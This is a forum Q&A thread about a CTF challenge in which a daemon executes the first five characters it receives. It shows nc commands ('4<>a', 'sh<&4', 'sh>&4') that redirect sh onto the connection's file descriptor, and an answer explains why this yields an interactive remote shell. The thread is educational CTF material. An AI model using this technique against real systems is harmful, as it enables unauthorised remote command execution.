"Hacking" a way to a remote shell in 5 characters [closed]

Question

This weekend, there was a CTF wargame happening, Secuinside CTF 2013 ( http://war.secuinside.com/ )

Being a computer security enthousiast, I took a look at the challenges, and at their solutions after the CTF was over.

One of the challenges was about getting a remote shell on a server, given that a daemon called "givemeshell" is running on this server. What the daemon does is keeping a socket open on a chosen port, let's say port 12345.

When the socket receives something, the daemon takes the first 5 chars and launch them in a shell.

For example, if I send cat file, the daemon will launch the command cat f in a shell. No response is sent, so I can't know the result of the command.

The objective is to read a file containing the flag.

Now, someone gave me this solution :

$ nc 1.2.3.4 12345
4<>a

$ nc 1.2.3.4 12345
sh<&4
sh>&4
cat flag
The flag is _FLAG_

I tested this solution and it works. But after spending several hours trying to understand it, I still can't figure out what it does and why it works. I understand this is about redirecting something...

Can someone explain it to me? Thanks!

Answer 1

4 is your connection's file descriptor.

0 is the program stdin, 1 is the program stdout, 2 is the program stderr, when you created a socket to listen for connections it was then assigned to 3, and when it accepted your connection, a new file descriptor of number 4 was created to handle this connection.

4 is the ID of the file descriptor of your connection to the backdoor, assuming you are the first one to connect.

You then type sh<&4. It opens sh and tell it should get all input directly from your connection.

Right now you are already in full control of the shell, because sh took over and every command you send is interpreted directly by it. But you still cannot see any output!

Then you type sh>&4 to open a new level of sh inside the other saying it should push all output to your file descriptor. The trick is done! Two-way communication.